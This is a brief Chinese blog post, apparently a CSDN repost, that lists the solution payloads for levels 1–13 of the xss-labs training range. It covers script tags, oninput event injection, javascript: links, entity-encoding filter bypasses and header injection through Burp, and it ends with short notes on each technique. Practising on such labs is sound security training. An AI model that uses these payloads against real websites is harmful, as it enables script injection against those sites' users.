xss-labs level 1~13

靶场地址:

https://github.com/do0dl3/xss-labs.git
或:
https://github.com/do0dl3/xss-labs

解题payload:

1<script>alert(111)</script>
2'><script>alert(111)</script>
3、' oninput='alert(123)  #然后在进行一次输入
4" οninput="alert(123)  #然后在进行一次输入
5"><a href="javascript:alert(123)">123</a>
6、"><a hREf="JavaScript:alert(123)">123</a>
7" oonninput="alert(123)"
8、javascri&#x70;t:alert()  
9、java&#115;cript:alert(9) //http://
10、t_sort=" oninput="alert(123)" type="text"
11、referer:http://xss:8080/level10.php?keyword=123&t_sort=" οninput="alert(123)" type="text				//bp
12" οninput="alert(123)" type="text			  //bp
13、user=call+me+maybe%3F" οninput="alert(/xss/)" type="text //bp

其中第一题可以直接执行js。
2~7 讲闭合。
8、9讲实体化。
10讲隐藏属性。
11~13则是讲抓包,从其他位置进行攻击。

猜你喜欢

转载自blog.csdn.net/my_name_is_sy/article/details/126038719
今日推荐